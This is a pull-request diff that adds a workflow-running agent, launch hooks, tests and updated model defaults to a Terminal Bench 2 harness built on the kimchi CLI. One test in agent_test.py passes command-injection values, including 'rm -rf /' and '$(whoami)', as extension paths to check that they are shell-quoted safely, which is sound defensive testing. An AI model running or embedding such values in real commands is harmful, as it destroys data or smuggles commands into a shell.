### PR TITLE
feat: Terminal Bench Workflow Agent + one shot ferment workflow

### DIFF
--- a/benchmark/terminal-bench-2/.gitignore
+++ b/benchmark/terminal-bench-2/.gitignore
@@ -6,3 +6,12 @@ __pycache__/
 *.egg-info/
 dist/
 build/
+node_modules/
+package-lock.json
+# ...except workflows/, which now depends on the PUBLISHED
+# @kimchi-dev/kimchi-workflows rather than a sibling checkout. Its lockfile
+# resolves entirely from the registry (no `file:` entries, so no machine-local
+# paths), which makes `npm ci` reproducible — and reproducibility is the point:
+# a typecheck or test run against a different engine build than the one a trial
+# loads proves nothing about that trial.
+!workflows/package-lock.json

--- a/benchmark/terminal-bench-2/README.md
+++ b/benchmark/terminal-bench-2/README.md
@@ -79,10 +79,22 @@ Each task declares its own per-attempt timeouts in `task.toml` (typically 10-15 
 ### Picking a model
 
 ```bash
-MODEL=kimchi-dev/kimi-k2.5 ./scripts/run-local.sh -i terminal-bench/fix-git
+MODEL=kimchi-dev/kimi-k2.7 ./scripts/run-local.sh -i terminal-bench/fix-git
 ```
 
-`MODEL` must be `<provider>/<id>`. Available `kimchi-dev` models include `kimi-k2.5`, `glm-5-fp8`, `minimax-m2.7`, `nemotron-3-super-fp4` (run `kimchi --list-models` for the live list). The qualifier is required because kimchi's built-in catalog also registers some IDs (notably `kimi-k2.5`) under the `opencode` provider — without `kimchi-dev/` the resolver picks `opencode` and fails auth with the kimchi key.
+`MODEL` must be `<provider>/<id>`. The qualifier is required because kimchi's built-in catalog also registers some IDs under the `opencode` provider — without `kimchi-dev/` the resolver picks `opencode` and fails auth with the kimchi key.
+
+> **Check the model exists before you trust a run.** `kimchi --list-models` is the live list; the
+> catalog changes and this file goes stale. A retired id does **not** fail loudly — kimchi prints
+> `Warning: Model "<id>" not found for provider "kimchi-dev". Using custom model id.` on stderr, then
+> every request fails and each agent turn returns an **empty** reply. Under a plain `--print` run that
+> looks like a bad model; under a workflow it looks like every step failing with
+> `the reply was not valid JSON (received: )`, which reads as an agent bug and is not one.
+> `kimi-k2.5` and `kimi-k2.6` were both defaults here after they had been retired, and cost a full
+> debugging cycle each.
+
+Verified present at the time of writing (`kimchi --list-models`): `kimi-k2.7`, `glm-5.2-fp8`,
+`minimax-m3`, `deepseek-v4-flash`, `nemotron-3-ultra-fp4`, plus the `kimchi-dev/anthropic` family.
 
 ### OpenCode with the Kimchi gateway
 
@@ -90,7 +102,7 @@ Use `run-opencode-kimchi.sh` when the benchmark should evaluate the OpenCode sca
 
 ```bash
 export KIMCHI_API_KEY=...
-MODEL=kimchi-dev/kimi-k2.5 ./scripts/run-opencode-kimchi.sh -i terminal-bench/fix-git
+MODEL=kimchi-dev/kimi-k2.7 ./scripts/run-opencode-kimchi.sh -i terminal-bench/fix-git
 ```
 
 The script requires `KIMCHI_API_KEY` in the host environment and forwards it to Harbor with `--ae KIMCHI_API_KEY=$KIMCHI_API_KEY`; you do not need to pass that `--ae` manually when using the script.
@@ -104,7 +116,7 @@ opencode --model=<MODEL> run --format=json --thinking --dangerously-skip-permiss
 To change models, change only `MODEL`:
 
 ```bash
-MODEL=kimchi-dev/minimax-m2.7 ./scripts/run-opencode-kimchi.sh -i terminal-bench/fix-git
+MODEL=kimchi-dev/minimax-m3 ./scripts/run-opencode-kimchi.sh -i terminal-bench/fix-git
 ```
 
 By default OpenCode uses the benchmark model for `small_model` too, keeping the whole run on the selected model. To use a cheaper Kimchi model for summary/title work, set `OPENCODE_SMALL_MODEL=kimchi-dev/<model-id>`; the adapter registers that model from the same metadata endpoint.
@@ -112,7 +124,7 @@ By default OpenCode uses the benchmark model for `small_model` too, keeping the 
 By default Harbor installs the latest `opencode-ai` package. Pin OpenCode for reproducible runs with `OPENCODE_VERSION`:
 
 ```bash
-OPENCODE_VERSION=1.14.33 MODEL=kimchi-dev/kimi-k2.5 \
+OPENCODE_VERSION=1.14.33 MODEL=kimchi-dev/kimi-k2.7 \
   ./scripts/run-opencode-kimchi.sh -i terminal-bench/fix-git
 ```
 
@@ -122,7 +134,7 @@ Use `run-claude-code-kimchi.sh` when the benchmark should evaluate the Claude Co
 
 ```bash
 export KIMCHI_API_KEY=...
-MODEL=kimchi-dev/kimi-k2.5 ./scripts/run-claude-code-kimchi.sh -i terminal-bench/fix-git
+MODEL=kimchi-dev/kimi-k2.7 ./scripts/run-claude-code-kimchi.sh -i terminal-bench/fix-git
 ```
 
 The Claude Code adapter accepts any `kimchi-dev/<model-id>` returned by Kimchi's model metadata endpoint (`/v1/models/metadata?include_in_cli=true`). It configures Claude Code with Kimchi's Anthropic-compatible endpoint (`https://llm.kimchi.dev/anthropic`), maps `KIMCHI_API_KEY` to `ANTHROPIC_AUTH_TOKEN`, clears `ANTHROPIC_API_KEY`, and pins Claude Code's default Sonnet/Opus/Haiku/subagent aliases to the selected model.
@@ -130,13 +142,13 @@ The Claude Code adapter accepts any `kimchi-dev/<model-id>` returned by Kimchi's
 To change models, change only `MODEL`:
 
 ```bash
-MODEL=kimchi-dev/minimax-m2.7 ./scripts/run-claude-code-kimchi.sh -i terminal-bench/fix-git
+MODEL=kimchi-dev/minimax-m3 ./scripts/run-claude-code-kimchi.sh -i terminal-bench/fix-git
 ```
 
 By default Harbor installs the latest Claude Code package. Pin Claude Code for reproducible runs with `CLAUDE_CODE_VERSION`:
 
 ```bash
-CLAUDE_CODE_VERSION=2.1.144 MODEL=kimchi-dev/kimi-k2.5 \
+CLAUDE_CODE_VERSION=2.1.144 MODEL=kimchi-dev/kimi-k2.7 \
   ./scripts/run-claude-code-kimchi.sh -i terminal-bench/fix-git
 ```
 
@@ -146,7 +158,7 @@ Use `run-gsd-kimchi.sh` when the benchmark should evaluate the GSD scaffold whil
 
 ```bash
 export KIMCHI_API_KEY=...
-MODEL=kimchi-dev/kimi-k2.5 ./scripts/run-gsd-kimchi.sh -i terminal-bench/fix-git
+MODEL=kimchi-dev/kimi-k2.7 ./scripts/run-gsd-kimchi.sh -i terminal-bench/fix-git
 ```
 
 The GSD adapter accepts any `kimchi-dev/<model-id>` returned by Kimchi's model metadata endpoint (`/v1/models/metadata?include_in_cli=true`). It installs `gsd-pi@latest` by default, writes a temporary GSD home with only the selected model, writes minimal GSD preferences that route every role to that model, and runs GSD in non-interactive print mode:
@@ -160,13 +172,13 @@ GSD's text output is captured at `agent/gsd.txt`, the resolved version at `agent
 To change models, change only `MODEL`:
 
 ```bash
-MODEL=kimchi-dev/minimax-m2.7 ./scripts/run-gsd-kimchi.sh -i terminal-bench/fix-git
+MODEL=kimchi-dev/minimax-m3 ./scripts/run-gsd-kimchi.sh -i terminal-bench/fix-git
 ```
 
 Override the GSD package version with `GSD_VERSION`:
 
 ```bash
-GSD_VERSION=3.0.0 MODEL=kimchi-dev/kimi-k2.5 \
+GSD_VERSION=3.0.0 MODEL=kimchi-dev/kimi-k2.7 \
   ./scripts/run-gsd-kimchi.sh -i terminal-bench/fix-git
 ```
 
@@ -175,7 +187,7 @@ GSD_VERSION=3.0.0 MODEL=kimchi-dev/kimi-k2.5 \
 To benchmark a model on its own, bypassing kimchi's multi-model orchestration, pass `--model <provider>/<id>` to select a specific model. The helper scripts do this by default through `MODEL`, which starts kimchi in single-model mode.
 
 ```bash
-MODEL=kimchi-dev/kimi-k2.6 ./scripts/run-local.sh -n 8 -k 3
+MODEL=kimchi-dev/kimi-k2.7 ./scripts/run-local.sh -n 8 -k 3
 ```
 
 Do not use `--agent-kwarg disable-multi-model=true`; the adapter accepts that legacy kwarg for compatibility, but current kimchi has no `--multi-model` CLI flag.
@@ -250,7 +262,7 @@ Tag format is `key:value`, comma-separated; keys and values are alphanumeric plu
 | `KIMCHI_API_KEY` | yes | Bearer token for `llm.kimchi.dev`; forwarded to the agent via `--ae` |
 | `KIMCHI_CODE_BINARY` | no | Host path to a prebuilt Linux `kimchi` binary (produced by `pnpm run build:binary-linux-x64` at `dist/bin/kimchi`). The agent uploads the binary's grandparent directory (the build/tarball root containing `bin/` + `share/kimchi/`), so the auxiliary files travel with it. When set, the agent skips the GitHub release download. `./scripts/run-local.sh` sets this for you. |
 | `GITHUB_TOKEN` | no | Raises GitHub API rate limits when fetching the latest release. Not required for public repos |
-| `MODEL` | no | Default `kimchi-dev/kimi-k2.5`. See "Picking a model" for the `<provider>/<id>` requirement |
+| `MODEL` | no | Default `kimchi-dev/kimi-k2.7`. See "Picking a model" for the `<provider>/<id>` requirement |
 | `OPENCODE_VERSION` | no | Pins the OpenCode version used by `run-opencode-kimchi.sh` |
 | `CLAUDE_CODE_VERSION` | no | Pins the Claude Code version used by `run-claude-code-kimchi.sh` |
 | `GSD_VERSION` | no | Overrides the GSD package version used by `run-gsd-kimchi.sh`; default install target is `gsd-pi@latest` |

--- a/benchmark/terminal-bench-2/scripts/run-claude-code-kimchi.sh
+++ b/benchmark/terminal-bench-2/scripts/run-claude-code-kimchi.sh
@@ -3,9 +3,9 @@
 # Kimchi Anthropic-compatible gateway. The selected model is controlled by MODEL.
 #
 # Usage examples:
-#   MODEL=kimchi-dev/kimi-k2.5 ./scripts/run-claude-code-kimchi.sh -i terminal-bench/fix-git
-#   MODEL=kimchi-dev/minimax-m2.7 ./scripts/run-claude-code-kimchi.sh -i terminal-bench/fix-git -k 3
-#   CLAUDE_CODE_VERSION=2.1.144 MODEL=kimchi-dev/kimi-k2.5 ./scripts/run-claude-code-kimchi.sh -i terminal-bench/fix-git
+#   MODEL=kimchi-dev/kimi-k2.7 ./scripts/run-claude-code-kimchi.sh -i terminal-bench/fix-git
+#   MODEL=kimchi-dev/minimax-m3 ./scripts/run-claude-code-kimchi.sh -i terminal-bench/fix-git -k 3
+#   CLAUDE_CODE_VERSION=2.1.144 MODEL=kimchi-dev/kimi-k2.7 ./scripts/run-claude-code-kimchi.sh -i terminal-bench/fix-git
 #   CLAUDE_CODE_API_MAX_RETRIES=0 ./scripts/run-claude-code-kimchi.sh -i terminal-bench/fix-git
 set -euo pipefail
 
@@ -27,7 +27,7 @@ RETRY_CONFIG="${RETRY_CONFIG:-$BENCH_DIR/config/retry.yaml}"
 HARBOR_ARGS=(
     --agent-import-path kimchi_agent:ClaudeCodeKimchi
     --env docker
-    --model "${MODEL:-kimchi-dev/kimi-k2.5}"
+    --model "${MODEL:-kimchi-dev/kimi-k2.7}"
     --ae "KIMCHI_API_KEY=$KIMCHI_API_KEY"
     --config "$RETRY_CONFIG"
     --max-retries "${CLAUDE_CODE_API_MAX_RETRIES:-5}"

--- a/benchmark/terminal-bench-2/scripts/run-gsd-kimchi.sh
+++ b/benchmark/terminal-bench-2/scripts/run-gsd-kimchi.sh
@@ -2,9 +2,9 @@
 # Run terminal-bench with GSD, configured to use one selected Kimchi model.
 #
 # Usage examples:
-#   MODEL=kimchi-dev/kimi-k2.5 ./scripts/run-gsd-kimchi.sh -i terminal-bench/fix-git
-#   MODEL=kimchi-dev/minimax-m2.7 ./scripts/run-gsd-kimchi.sh -i terminal-bench/fix-git -k 3
-#   GSD_VERSION=3.0.0 MODEL=kimchi-dev/kimi-k2.5 ./scripts/run-gsd-kimchi.sh -i terminal-bench/fix-git
+#   MODEL=kimchi-dev/kimi-k2.7 ./scripts/run-gsd-kimchi.sh -i terminal-bench/fix-git
+#   MODEL=kimchi-dev/minimax-m3 ./scripts/run-gsd-kimchi.sh -i terminal-bench/fix-git -k 3
+#   GSD_VERSION=3.0.0 MODEL=kimchi-dev/kimi-k2.7 ./scripts/run-gsd-kimchi.sh -i terminal-bench/fix-git
 set -euo pipefail
 
 DATASET="terminal-bench/terminal-bench-2"
@@ -17,7 +17,7 @@ cd "$BENCH_DIR"
 HARBOR_ARGS=(
     --agent-import-path kimchi_agent:GsdKimchi
     --env docker
-    --model "${MODEL:-kimchi-dev/kimi-k2.5}"
+    --model "${MODEL:-kimchi-dev/kimi-k2.7}"
     --ae "KIMCHI_API_KEY=$KIMCHI_API_KEY"
     -d "$DATASET"
 )

--- a/benchmark/terminal-bench-2/scripts/run-local.sh
+++ b/benchmark/terminal-bench-2/scripts/run-local.sh
@@ -5,7 +5,7 @@
 #
 # Usage examples:
 #   ./scripts/run-local.sh -i terminal-bench/fix-git
-#   MODEL=kimchi-dev/kimi-k2.5 ./scripts/run-local.sh -i terminal-bench/fix-git -k 3
+#   MODEL=kimchi-dev/kimi-k2.7 ./scripts/run-local.sh -i terminal-bench/fix-git -k 3
 #   MODEL=multi-model ./scripts/run-local.sh -i terminal-bench/fix-git -k 3
 set -euo pipefail
 
@@ -26,7 +26,7 @@ cd "$BENCH_DIR"
 exec uv run --python 3.14 harbor run \
     --agent-import-path kimchi_agent:Kimchi \
     --env docker \
-    --model "${MODEL:-kimchi-dev/kimi-k2.5}" \
+    --model "${MODEL:-kimchi-dev/kimi-k2.7}" \
     --ae "KIMCHI_API_KEY=$KIMCHI_API_KEY" \
     -d "$DATASET" \
     "$@"

--- a/benchmark/terminal-bench-2/scripts/run-opencode-kimchi.sh
+++ b/benchmark/terminal-bench-2/scripts/run-opencode-kimchi.sh
@@ -3,9 +3,9 @@
 # OpenAI-compatible gateway. The selected model is controlled by MODEL.
 #
 # Usage examples:
-#   MODEL=kimchi-dev/kimi-k2.5 ./scripts/run-opencode-kimchi.sh -i terminal-bench/fix-git
-#   MODEL=kimchi-dev/minimax-m2.7 ./scripts/run-opencode-kimchi.sh -i terminal-bench/fix-git -k 3
-#   OPENCODE_VERSION=1.14.33 MODEL=kimchi-dev/kimi-k2.5 ./scripts/run-opencode-kimchi.sh -i terminal-bench/fix-git
+#   MODEL=kimchi-dev/kimi-k2.7 ./scripts/run-opencode-kimchi.sh -i terminal-bench/fix-git
+#   MODEL=kimchi-dev/minimax-m3 ./scripts/run-opencode-kimchi.sh -i terminal-bench/fix-git -k 3
+#   OPENCODE_VERSION=1.14.33 MODEL=kimchi-dev/kimi-k2.7 ./scripts/run-opencode-kimchi.sh -i terminal-bench/fix-git
 set -euo pipefail
 
 DATASET="terminal-bench/terminal-bench-2"
@@ -18,7 +18,7 @@ cd "$BENCH_DIR"
 HARBOR_ARGS=(
     --agent-import-path kimchi_agent:OpenCodeKimchi
     --env docker
-    --model "${MODEL:-kimchi-dev/kimi-k2.5}"
+    --model "${MODEL:-kimchi-dev/kimi-k2.7}"
     --ae "KIMCHI_API_KEY=$KIMCHI_API_KEY"
     -d "$DATASET"
 )

--- a/benchmark/terminal-bench-2/scripts/run-release.sh
+++ b/benchmark/terminal-bench-2/scripts/run-release.sh
@@ -5,7 +5,7 @@
 #
 # Usage examples:
 #   ./scripts/run-release.sh -i terminal-bench/fix-git
-#   MODEL=kimchi-dev/minimax-m2.7 ./scripts/run-release.sh -i terminal-bench/fix-git
+#   MODEL=kimchi-dev/minimax-m3 ./scripts/run-release.sh -i terminal-bench/fix-git
 #   MODEL=multi-model ./scripts/run-release.sh -i terminal-bench/fix-git -k 3
 set -euo pipefail
 
@@ -22,7 +22,7 @@ unset KIMCHI_CODE_BINARY
 exec uv run --python 3.14 harbor run \
     --agent-import-path kimchi_agent:Kimchi \
     --env docker \
-    --model "${MODEL:-kimchi-dev/kimi-k2.5}" \
+    --model "${MODEL:-kimchi-dev/kimi-k2.7}" \
     --ae "KIMCHI_API_KEY=$KIMCHI_API_KEY" \
     -d "$DATASET" \
     "$@"

--- a/benchmark/terminal-bench-2/scripts/run-workflow.sh
+++ b/benchmark/terminal-bench-2/scripts/run-workflow.sh
@@ -1,0 +1,43 @@
+#!/usr/bin/env bash
+# Run terminal-bench with WorkflowAgent: kimchi plus the kimchi-workflows
+# extension, running one named workflow. Always cross-builds a Linux amd64
+# kimchi binary, matching run-local.sh.
+#
+# Usage examples:
+#   ./scripts/run-workflow.sh -i terminal-bench/fix-git
+#   WORKFLOW=tb-solver ./scripts/run-workflow.sh -i terminal-bench/fix-git -k 3
+#   EXTENSION=dir:/path/to/kimchi-workflows ./scripts/run-workflow.sh -i terminal-bench/fix-git
+set -euo pipefail
+
+DATASET="${DATASET:-terminal-bench/terminal-bench-2-1}"
+
+: "${KIMCHI_API_KEY:?set KIMCHI_API_KEY in env}"
+
+BENCH_DIR="$(cd "$(dirname "$0")/.." && pwd)"
+REPO_ROOT="$(git -C "$BENCH_DIR" rev-parse --show-toplevel)"
+
+echo "==> Cross-building kimchi (target=linux-x64)"
+(cd "$REPO_ROOT" && pnpm run build:binary-linux-x64)
+# `build:binary-linux-x64` produces dist/bin/kimchi alongside dist/share/kimchi/{package.json,theme,export-html}.
+# The agent walks up from the binary to find the share/ tree, so point KIMCHI_CODE_BINARY at bin/kimchi.
+export KIMCHI_CODE_BINARY="$REPO_ROOT/dist/bin/kimchi"
+
+# The extension is resolved on the host and uploaded, never installed in the
+# container: task images ship no Node toolchain, so `-e npm:...` fails there
+# with `Executable not found in $PATH: "npm"`. Pin the version — host
+# resolution caches by `<pkg>@<version>`, so a job resolves once, not per trial.
+# Use `dir:<path to a checkout>` to test unreleased engine changes.
+EXTENSION="${EXTENSION:-npm:@kimchi-dev/kimchi-workflows@0.0.1-alpha.1}"
+# The workflow's declared name, not a filename.
+WORKFLOW="${WORKFLOW:-ferment-oneshot}"
+
+cd "$BENCH_DIR"
+exec uv run --python 3.14 harbor run \
+    --agent-import-path kimchi_agent:WorkflowAgent \
+    --env docker \
+    --model "${MODEL:-kimchi-dev/kimi-k2.7}" \
+    --ae "KIMCHI_API_KEY=$KIMCHI_API_KEY" \
+    --agent-kwarg "extension=$EXTENSION" \
+    --agent-kwarg "workflow=$WORKFLOW" \
+    -d "$DATASET" \
+    "$@"

--- a/benchmark/terminal-bench-2/src/kimchi_agent/__init__.py
+++ b/benchmark/terminal-bench-2/src/kimchi_agent/__init__.py
@@ -2,5 +2,6 @@ from kimchi_agent.agent import Kimchi
 from kimchi_agent.claude_code_kimchi import ClaudeCodeKimchi
 from kimchi_agent.gsd_kimchi import GsdKimchi
 from kimchi_agent.opencode_kimchi import OpenCodeKimchi
+from kimchi_agent.workflow_agent import WorkflowAgent
 
-__all__ = ["ClaudeCodeKimchi", "GsdKimchi", "Kimchi", "OpenCodeKimchi"]
+__all__ = ["ClaudeCodeKimchi", "GsdKimchi", "Kimchi", "OpenCodeKimchi", "WorkflowAgent"]

--- a/benchmark/terminal-bench-2/src/kimchi_agent/agent.py
+++ b/benchmark/terminal-bench-2/src/kimchi_agent/agent.py
@@ -66,12 +66,12 @@ def _validate_model_name(model_name: str | None) -> None:
     if not model_name or "/" not in model_name:
         raise ValueError(
             "--model is required and must be qualified with a provider "
-            "(e.g. kimchi-dev/kimi-k2.5, kimchi-dev/glm-5-fp8, kimchi-dev/minimax-m2.7)"
+            "(e.g. kimchi-dev/kimi-k2.7, kimchi-dev/glm-5.2-fp8, kimchi-dev/minimax-m3)"
         )
     provider, model_id = model_name.split("/", 1)
     if not provider or not model_id:
         raise ValueError(
-            f"--model must be qualified as <provider>/<id> (got {model_name!r}); use e.g. kimchi-dev/kimi-k2.5"
+            f"--model must be qualified as <provider>/<id> (got {model_name!r}); use e.g. kimchi-dev/kimi-k2.7"
         )
 
 
@@ -271,7 +271,7 @@ class Kimchi(BaseInstalledAgent):
         context: AgentContext,
     ) -> None:
         if not self._multi_model_enabled:
-            # kimchi's built-in pi-ai catalog also registers models like kimi-k2.5 under
+            # kimchi's built-in pi-ai catalog also registers models like kimi-k2.7 under
             # the opencode provider. Without a qualifier the resolver may pick opencode and
             # fail auth with the kimchi key, so we force the caller to be explicit.
             _validate_model_name(self.model_name)
@@ -327,6 +327,26 @@ class Kimchi(BaseInstalledAgent):
             await self._terminate_kimchi_process_group(environment)
             raise
 
+    def _extension_paths(self) -> list[str]:
+        """Paths/specs to load with ``-e``. Empty means no ``-e`` flag at all.
+
+        This and the two hooks below exist so a subclass never has to override
+        ``run()``, which owns model validation, tag merging, the env dict,
+        process-group launch and cancellation cleanup — and carries
+        ``@with_prompt_template``, whose ``render_instruction`` is not
+        idempotent, so a subclass calling a decorated ``super().run()`` would
+        render the template twice.
+        """
+        return []
+
+    def _stdin_payload(self, instruction: str) -> str:
+        """What to pipe to kimchi, when it is not the instruction verbatim."""
+        return instruction
+
+    def _pre_launch_commands(self, instruction: str) -> list[str]:
+        """Shell commands to run in the launch pipeline, before kimchi starts."""
+        return []
+
     def _kimchi_launch_command(self, instruction: str, cli_flags: str) -> str:
         runner = self._kimchi_command(cli_flags)
         parts = [
@@ -343,14 +363,16 @@ class Kimchi(BaseInstalledAgent):
         skills_registration = self._skills_registration_command()
         if skills_registration:
             parts.append(skills_registration)
+        parts.extend(self._pre_launch_commands(instruction))
 
         parts.append(
             # Enable job control so the backgrounded kimchi pipeline gets a
             # process group that can be terminated as a unit on timeout.
             "set -m && { "
-            # Feed the task prompt through stdin and background the pipeline so
-            # this wrapper shell can record the process-group id before waiting.
-            f"(printf '%s' {shlex.quote(instruction)} | {runner}) & "
+            # Feed the task prompt (or a subclass-supplied payload) through
+            # stdin and background the pipeline so this wrapper shell can
+            # record the process-group id before waiting.
+            f"(printf '%s' {shlex.quote(self._stdin_payload(instruction))} | {runner}) & "
             # $! is the pid of the most recent background job, here the kimchi
             # pipeline leader as seen by the shell.
             "agent_pid=$!; "
@@ -407,8 +429,14 @@ class Kimchi(BaseInstalledAgent):
         if not self._multi_model_enabled:
             model_flag = f"--model {shlex.quote(self.model_name or '')} "
 
+        # Extension flags, if any, come right after the binary path — before
+        # --print/--session/--model — matching the ordering used elsewhere
+        # (e.g. the workflow-agent launch command in the design doc).
+        extension_flags = "".join(f"-e {shlex.quote(path)} " for path in self._extension_paths())
+
         return (
             f"{shlex.quote(BINARY_PATH)} "
+            f"{extension_flags}"
             f"--print --session {shlex.quote(CONTAINER_MAIN_SESSION)} "
             f"{model_flag}"
             f"{cli_flags}"
@@ -495,9 +523,10 @@ class Kimchi(BaseInstalledAgent):
         total_cache_write_tokens = 0
         total_cost = 0.0
 
-        # Aggregate main.jsonl + Agent child <timestamp>_<uuid>.jsonl siblings.
-        # Agent runs are separate sessions, so their usage isn't reflected in main.jsonl.
-        for session_file in sorted(sessions_dir.glob("*.jsonl")):
+        # rglob, not glob: an extension may nest per-step sessions under
+        # sessions/<subdir>/, and a flat glob silently under-reports those
+        # as zero tokens for work that really happened.
+        for session_file in sorted(sessions_dir.rglob("*.jsonl")):
             try:
                 lines = session_file.read_text().splitlines()
             except OSError as exc:

--- a/benchmark/terminal-bench-2/src/kimchi_agent/agent_test.py
+++ b/benchmark/terminal-bench-2/src/kimchi_agent/agent_test.py
@@ -8,6 +8,7 @@ import pytest
 from harbor.models.agent.context import AgentContext
 
 from kimchi_agent.agent import (
+    BINARY_PATH,
     CONTAINER_AGENT_PGID_FILE,
     CONTAINER_HARNESS_SKILLS_DIR,
     KIMCHI_EXIT_OUTPUT_TAIL_LINES,
@@ -342,3 +343,143 @@ def test_populate_context_skips_unreadable_session_files(tmp_path: Path) -> None
     assert context.n_cache_tokens == 2
     assert context.cost_usd == 0.5
     warning.assert_called_once()
+
+
+async def test_default_hooks_leave_the_launch_command_unchanged(tmp_path: Path) -> None:
+    # With no overrides the three seam hooks must be invisible in the launch command.
+    class ExplicitDefaultsKimchi(RecordingKimchi):
+        def _extension_paths(self) -> list[str]:
+            return []
+
+        def _stdin_payload(self, instruction: str) -> str:
+            return instruction
+
+        def _pre_launch_commands(self, instruction: str) -> list[str]:
+            return []
+
+    async def launch_command(cls: type[RecordingKimchi]) -> str:
+        agent = cls(
+            logs_dir=tmp_path / "jobs" / "run-1" / "task__trial" / "agent",
+            model_name="kimchi-dev/kimi-k2.6",
+        )
+        with pytest.raises(asyncio.CancelledError):
+            await agent.run("hello", object(), AgentContext())
+        return agent.agent_commands[0]
+
+    command = await launch_command(RecordingKimchi)
+
+    assert command == await launch_command(ExplicitDefaultsKimchi)
+    assert f"{BINARY_PATH} --print" in command
+    assert " -e " not in command
+    assert "printf '%s' hello |" in command
+
+
+async def test_extension_paths_override_adds_quoted_e_flags_after_binary_path(
+    tmp_path: Path,
+) -> None:
+    class ExtensionKimchi(RecordingKimchi):
+        def _extension_paths(self) -> list[str]:
+            return ["/installed-agent/kimchi-workflows", "/path with spaces/ext"]
+
+    agent = ExtensionKimchi(
+        logs_dir=tmp_path / "jobs" / "run-1" / "task__trial" / "agent",
+        model_name="kimchi-dev/kimi-k2.6",
+    )
+
+    with pytest.raises(asyncio.CancelledError):
+        await agent.run("hello", object(), AgentContext())
+
+    command = agent.agent_commands[0]
+    assert (
+        "/installed-agent/bin/kimchi -e /installed-agent/kimchi-workflows "
+        "-e '/path with spaces/ext' --print --session"
+    ) in command
+
+
+async def test_extension_path_with_shell_metacharacters_is_safely_quoted(
+    tmp_path: Path,
+) -> None:
+    class ExtensionKimchi(RecordingKimchi):
+        def _extension_paths(self) -> list[str]:
+            return ["/tmp/ext; rm -rf /", "/tmp/$(whoami)"]
+
+    agent = ExtensionKimchi(
+        logs_dir=tmp_path / "jobs" / "run-1" / "task__trial" / "agent",
+        model_name="kimchi-dev/kimi-k2.6",
+    )
+
+    with pytest.raises(asyncio.CancelledError):
+        await agent.run("hello", object(), AgentContext())
+
+    command = agent.agent_commands[0]
+    assert "-e '/tmp/ext; rm -rf /'" in command
+    assert "-e '/tmp/$(whoami)'" in command
+
+
+async def test_stdin_payload_override_replaces_instruction_on_stdin(tmp_path: Path) -> None:
+    class StdinKimchi(RecordingKimchi):
+        def _stdin_payload(self, instruction: str) -> str:
+            return "/workflow run tb-solver --input @/logs/agent/workflow-input.json"
+
+    agent = StdinKimchi(
+        logs_dir=tmp_path / "jobs" / "run-1" / "task__trial" / "agent",
+        model_name="kimchi-dev/kimi-k2.6",
+    )
+
+    with pytest.raises(asyncio.CancelledError):
+        await agent.run("the secret task instruction", object(), AgentContext())
+
+    command = agent.agent_commands[0]
+    assert (
+        "printf '%s' '/workflow run tb-solver --input @/logs/agent/workflow-input.json' |"
+    ) in command
+    assert "the secret task instruction" not in command
+
+
+async def test_pre_launch_commands_override_lands_before_kimchi_starts(tmp_path: Path) -> None:
+    class PreLaunchKimchi(RecordingKimchi):
+        def _pre_launch_commands(self, instruction: str) -> list[str]:
+            return [f"touch /tmp/pre-launch-marker-{instruction}"]
+
+    agent = PreLaunchKimchi(
+        logs_dir=tmp_path / "jobs" / "run-1" / "task__trial" / "agent",
+        model_name="kimchi-dev/kimi-k2.6",
+    )
+
+    with pytest.raises(asyncio.CancelledError):
+        await agent.run("hello", object(), AgentContext())
+
+    command = agent.agent_commands[0]
+    marker = "touch /tmp/pre-launch-marker-hello"
+    assert marker in command
+    # Follows the same established pattern as harness settings / skills
+    # registration: appended to `parts`, immediately before the final
+    # `set -m && { ... }` block that actually launches kimchi.
+    assert f"{marker} && set -m" in command
+
+
+def test_populate_context_counts_nested_workflow_session_files(tmp_path: Path) -> None:
+    logs_dir = tmp_path / "jobs" / "run-1" / "task__trial" / "agent"
+    sessions_dir = logs_dir / "sessions"
+    workflow_dir = sessions_dir / "workflow"
+    workflow_dir.mkdir(parents=True)
+    flat = sessions_dir / "main.jsonl"
+    nested = workflow_dir / "step-1.jsonl"
+    flat.write_text(
+        '{"type":"message","message":{"role":"assistant","usage":{"input":10,"output":3,"cacheRead":2,"cacheWrite":1,"cost":{"total":0.5}}}}\n'
+    )
+    nested.write_text(
+        '{"type":"message","message":{"role":"assistant","usage":{"input":20,"output":5,"cacheRead":0,"cacheWrite":0,"cost":{"total":0.25}}}}\n'
+    )
+
+    agent = Kimchi(logs_dir=logs_dir, model_name="kimchi-dev/kimi-k2.6")
+    context = AgentContext()
+    agent.populate_context_post_run(context)
+
+    # Both the flat main.jsonl and the nested sessions/workflow/step-1.jsonl
+    # must be counted: a workflow (or any future extension) writing per-step
+    # sessions into a subdirectory must not silently drop those tokens/cost.
+    assert context.n_input_tokens == (10 + 2 + 1) + 20
+    assert context.n_output_tokens == 3 + 5
+    assert context.n_cache_tokens == 2
+    assert context.cost_usd == 0.75

--- a/benchmark/terminal-bench-2/src/kimchi_agent/conformance_test.py
+++ b/benchmark/terminal-bench-2/src/kimchi_agent/conformance_test.py
@@ -1,0 +1,162 @@
+"""Conformance contract for kimchi-family agents.
+
+Every kimchi-family agent must produce the same ``result.json`` shape —
+``agent_info.name``/``version``, token/cost accounting, the env dict shape,
+prompt-template rendering. This file makes that contract real: a
+conformance test parameterised over every kimchi-family agent. Adding an
+agent means adding it to the parameter list; the test fails if its artifacts
+diverge.
+
+So this file, not the ``WorkflowAgent(Kimchi)`` class declaration, is the
+actual deliverable: extend ``KIMCHI_FAMILY_AGENTS`` when a new kimchi-family
+agent is added, and these tests hold it to the same contract as everything
+before it with zero new code.
+"""
+
+import asyncio
+import json
+from pathlib import Path
+
+import pytest
+from harbor.models.agent.context import AgentContext
+
+from kimchi_agent.agent import Kimchi
+from kimchi_agent.workflow_agent import WorkflowAgent
+
+
+class _RecordingExecMixin:
+    def __init__(self, *args, **kwargs):
+        super().__init__(*args, **kwargs)
+        self.agent_commands: list[str] = []
+        self.agent_envs: list[dict[str, str] | None] = []
+
+    async def exec_as_agent(self, _environment, command: str, env=None, cwd=None, timeout_sec=None):
+        self.agent_commands.append(command)
+        self.agent_envs.append(env)
+        raise asyncio.CancelledError
+
+    async def exec_as_root(self, _environment, command: str, env=None, cwd=None, timeout_sec=None):
+        pass
+
+
+class RecordingKimchi(_RecordingExecMixin, Kimchi):
+    pass
+
+
+class RecordingWorkflowAgent(_RecordingExecMixin, WorkflowAgent):
+    pass
+
+
+# The parameter list IS the conformance surface: every kimchi-family agent
+# must appear here. `ids` keeps failures readable ("FAILED ...[WorkflowAgent]"
+# rather than "...[RecordingWorkflowAgent]").
+KIMCHI_FAMILY_AGENTS = [RecordingKimchi, RecordingWorkflowAgent]
+KIMCHI_FAMILY_AGENT_IDS = ["Kimchi", "WorkflowAgent"]
+
